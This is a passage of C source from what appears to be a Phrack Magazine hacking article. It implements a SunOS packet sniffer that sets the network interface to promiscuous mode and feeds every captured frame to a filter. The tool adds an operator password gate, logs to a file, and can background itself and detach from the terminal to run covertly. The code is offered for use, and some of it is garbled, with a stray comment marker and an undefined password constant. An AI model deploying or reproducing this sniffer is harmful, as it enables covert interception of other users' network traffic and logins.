    if(!(buf=malloc(CHUNKSIZE)))
        Pexit(1,"Eth: malloc");

/* this /dev/nit initialization code pinched from etherfind */
  {
    struct strioctl si;
    struct ifreq    ifr;
    struct timeval  timeout;
    u_int  chunksize = CHUNKSIZE;
    u_long if_flags  = NI_PROMISC;

    if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
        Pexit(1,"Eth: nit open");

    if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
        Pexit(1,"Eth: ioctl (I_SRDOPT)");

    si.ic_timout = INFTIM;

    if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
        Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");

    timeout.tv_sec = 1;
    timeout.tv_usec = 0;
    si.ic_cmd = NIOCSTIME;
    si.ic_len = sizeof(timeout);
    si.ic_dp  = (char *)&timeout;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");

    si.ic_cmd = NIOCSCHUNK;
    si.ic_len = sizeof(chunksize);
    si.ic_dp  = (char *)&chunksize;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");

    strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
    ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
    si.ic_cmd = NIOCBIND;
    si.ic_len = sizeof(ifr);
    si.ic_dp  = (char *)&ifr;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");

    si.ic_cmd = NIOCSFLAGS;
    si.ic_len = sizeof(if_flags);
    si.ic_dp  = (char *)&if_flags;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");

    if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
        Pexit(1,"Eth: ioctl (I_FLUSH)");
  }

    while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
        register char *bp = buf,
                      *bufstop = (buf + cc);

        while (bp < bufstop) {
            register char *cp = bp;
            register struct nit_bufhdr *hdrp;

            hdrp = (struct nit_bufhdr *)cp;
            cp += sizeof(struct nit_bufhdr);
            bp += hdrp->nhb_totlen;
            filter(cp, (u_long)hdrp->nhb_msglen);
        }
    }
    Pexit((-1),"Eth: read");
}
 /* Authorize your proogie,generate your own password and uncomment here */
/* #define AUTHPASSWD "EloiZgZejWyms" */

void getauth()
{ char *buf,*getpass(),*crypt();
  char pwd[21],prmpt[81];

    strcpy(pwd,AUTHPASSWD);
    sprintf(prmpt,"(%s)UP? ",ProgName);
    buf=getpass(prmpt);
    if(strcmp(pwd,crypt(buf,pwd)))
        exit(1);
}
    */
void main(argc, argv)
int argc;
char **argv;
{
    char   cbuf[BUFSIZ];
    struct ifconf ifc;
    int    s,
           ac=1,
           backg=0;

    ProgName=argv[0];

 /*     getauth(); */

    LOG=NULL;
    device=NULL;
    while((ac<argc) && (argv[ac][0] == '-')) {
       register char ch = argv[ac++][1];
       switch(toupper(ch)) {
            case 'I': device=argv[ac++];
                      break;
            case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
                         Zexit(1,"Output file cant be opened\n");
                      break;
            case 'B': backg=1;
                      break;
            case 'D': debug=1;
                      break;
            default : fprintf(ERR,
                        "Usage: %s [-b] [-d] [-i interface] [-f file]\n",
                            ProgName);
                      exit(1);
       }
    }

    if(!device) {
        if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
            Pexit(1,"Eth: socket");

        ifc.ifc_len = sizeof(cbuf);
        ifc.ifc_buf = cbuf;
        if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
            Pexit(1,"Eth: ioctl");

        close(s);
        device = ifc.ifc_req->ifr_name;
    }

    fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
    fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
            (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");

    if(!LOG)
        LOG=stdout;

    signal(SIGINT, death);
    signal(SIGTERM,death);
    signal(SIGKILL,death);
    signal(SIGQUIT,death);

    if(backg && debug) {
         fprintf(ERR,"[Cannot bg with debug on]\n");
         backg=0;
    }

    if(backg) {
        register int s;

        if((s=fork())>0) {
           fprintf(ERR,"[pid %d]\n",s);
           exit(0);
        } else if(s<0)
           Pexit(1,"fork");

        if( (s=open("/dev/tty",O_RDWR))>0 ) {
                ioctl(s,TIOCNOTTY,(char *)NULL);
                close(s);
        }
    }
    fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
    fflush(LOG);

    do_it();
}

[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]
© Copyleft 1985-2021, Phrack Magazine.